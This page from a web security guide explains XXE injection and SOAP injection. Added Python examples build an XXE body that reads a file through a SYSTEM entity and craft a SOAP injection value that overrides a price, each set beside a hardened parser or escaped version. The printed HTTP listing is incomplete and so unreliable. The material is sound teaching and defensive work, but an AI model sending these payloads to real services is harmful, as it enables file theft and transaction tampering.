Web application security - the fast guide 1.1 | Page 149

Chapter 7 - Attack execution (3)

The weakness here is the echo functionality: part of the server response contains the search string taken from the request. When that request is XML, an attack named XXE (XML External Entity injection) becomes applicable.

Attack requirements:
A. The request body is in XML format.
B. The application does not reject or strip the SYSTEM or ENTITY keywords (no validation of the document type declaration).
C. Echo functionality is available, so the parsed value is reflected in the response.

Attack process
The attacker prepends a definition header to the XML request: a document type declaration introduced by the DOCTYPE keyword and closed by ]>, which declares an entity. Once declared, every reference to that entity (an ampersand, the entity name and a semicolon) is replaced by the entity's value when the XML is parsed. The dangerous part is that an entity can be defined as an external reference using the SYSTEM keyword followed by a standard URL, including the file: protocol, so the entity's value becomes the contents of a file on the server, and the echo functionality returns it to the attacker.

The following listing illustrates the use of XML format in an HTTP request that sends data to a search page:

POST /search/searchPage.ashx HTTP/1.1
Host: victim.com
Content-Type: text/xml; charset=UTF-8
Content-Length: 117

]>
&xxe

The result is that the contents of the win.ini file are returned as part of the server response.

7.9 Attack SOAP Services
SOAP stands for Simple Object Access Protocol, an XML-based encapsulation technique that facilitates message-based communication; it is commonly used to integrate different systems running on different platforms.

Attack requirement:
No validation of the parameter values that the application copies into the SOAP message.

Attack process
The attack depends on injecting XML tags through the parameters of the URL that calls the web service. When the application copies those values into the SOAP message without escaping them, the injected tags become part of the transferred message and alter what the receiving system processes, tricking the victim system into acting on data the attacker controls.
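The XXE request described above, reproduced locally as an added example (this is not code from the book): Python's xml.sax parser follows a SYSTEM identifier only when feature_external_ges is switched on, which makes it convenient for showing both the vulnerable behaviour and the hardened configuration side by side. The <search> element name, the entity name xxe and the constructed secret file that stands in for win.ini are assumptions made for this example.

```python
# Added example (not code from the book): XXE through a SYSTEM entity with a
# file: URL, parsed with xml.sax in its vulnerable and hardened configurations.
# The <search> element, the entity name and the secret file are assumptions.
import io
import os
import tempfile
from xml.sax import handler, make_parser
from xml.sax.handler import feature_external_ges, feature_external_pes


class SearchTermHandler(handler.ContentHandler):
    """Collect the character data of <search>, i.e. the text a vulnerable
    search page would echo back in its response."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self._parts = []

    def startElement(self, name, attrs):
        if name == "search":
            self._inside = True

    def endElement(self, name):
        if name == "search":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self._parts.append(content)

    @property
    def term(self):
        return "".join(self._parts)


def build_xxe_body(target_path):
    """Attacker's request body: a DOCTYPE declaring an external general entity
    whose SYSTEM identifier is a file: URL, referenced where the search term
    normally goes. target_path must be absolute so the URL is file:///..."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE search [\n"
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        "]>\n"
        "<search>&xxe;</search>\n"
    )


def extract_search_term(xml_text, resolve_external_entities):
    """Parse the body the way the server side would and return the term it
    would echo. True models a parser that resolves SYSTEM entities (the
    vulnerable setting); False is the hardened configuration."""
    parser = make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.setFeature(feature_external_pes, resolve_external_entities)
    collector = SearchTermHandler()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return collector.term


def demonstrate():
    """Write a constructed secret file (stand-in for win.ini), send the XXE
    body through both parser configurations and return (leaked, hardened)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.ini")
        with open(secret_path, "w", encoding="utf-8") as f:
            f.write("[credentials]\npassword=hunter2\n")  # constructed content
        body = build_xxe_body(secret_path)
        leaked = extract_search_term(body, resolve_external_entities=True)
        hardened = extract_search_term(body, resolve_external_entities=False)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = demonstrate()
    print("vulnerable parser echoes:", repr(leaked))
    print("hardened parser echoes:  ", repr(hardened))
```

With the external-entity feature enabled the echoed search term is the file's contents, exactly the win.ini case in the text; with it disabled the entity is skipped and nothing is echoed. The same check applies to any XML stack: confirm that DOCTYPE processing or external entity resolution is off, rather than trying to filter the SYSTEM keyword out of requests.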
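The SOAP attack in 7.9 as an added example (not code from the book): a front end that copies URL parameters into the SOAP envelope unescaped, the escaped construction that keeps injected tags as plain text, and a model of what the receiving service then sees. The PlaceOrder service, its namespace, element names and the injected quantity value are hypothetical.

```python
# Added example (not code from the book): SOAP injection through an unescaped
# parameter, beside the escaped construction. The PlaceOrder service, its
# namespace, element names and the attacker's value are hypothetical.
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SERVICE_NS = "http://example.invalid/orders"  # hypothetical service namespace

# Hypothetical value supplied for the quantity parameter of the URL that calls
# the web service: it closes Quantity and smuggles in a Price element.
INJECTED_QUANTITY = "1</Quantity><Price>0.01</Price><Quantity>1"


def build_envelope_unsafe(item_id, quantity):
    """Front end that interpolates the URL parameters straight into the SOAP
    message: any tags the caller supplies become part of the message."""
    return (
        f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
        f'<PlaceOrder xmlns="{SERVICE_NS}">'
        f"<ItemId>{item_id}</ItemId>"
        f"<Quantity>{quantity}</Quantity>"
        "<Price>49.99</Price>"
        "</PlaceOrder></soap:Body></soap:Envelope>"
    )


def build_envelope_safe(item_id, quantity):
    """Same message with every parameter value XML-escaped, so <, > and & in
    the input are character data rather than markup."""
    return (
        f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
        f'<PlaceOrder xmlns="{SERVICE_NS}">'
        f"<ItemId>{escape(str(item_id))}</ItemId>"
        f"<Quantity>{escape(str(quantity))}</Quantity>"
        "<Price>49.99</Price>"
        "</PlaceOrder></soap:Body></soap:Envelope>"
    )


def order_as_seen_by_service(envelope):
    """Model of the receiving service: parse the envelope and take the first
    ItemId, Quantity and Price element, as a typical deserializer would.
    Returns (item_id, quantity, price) as strings."""
    root = ET.fromstring(envelope)
    order = root.find(f"{{{SOAP_NS}}}Body/{{{SERVICE_NS}}}PlaceOrder")

    def first(tag):
        return order.findtext(f"{{{SERVICE_NS}}}{tag}")

    return first("ItemId"), first("Quantity"), first("Price")


if __name__ == "__main__":
    for build in (build_envelope_unsafe, build_envelope_safe):
        print(build.__name__, "->", order_as_seen_by_service(build("A100", INJECTED_QUANTITY)))
```

The unsafe envelope parses cleanly, which is what makes the attack quiet: the service sees quantity 1 at a price of 0.01, the attacker's element having displaced the real one. In the escaped envelope the same input is just an odd-looking quantity string and the genuine price survives; building the envelope with an XML library instead of string formatting gives the same protection without having to remember to call escape on every value.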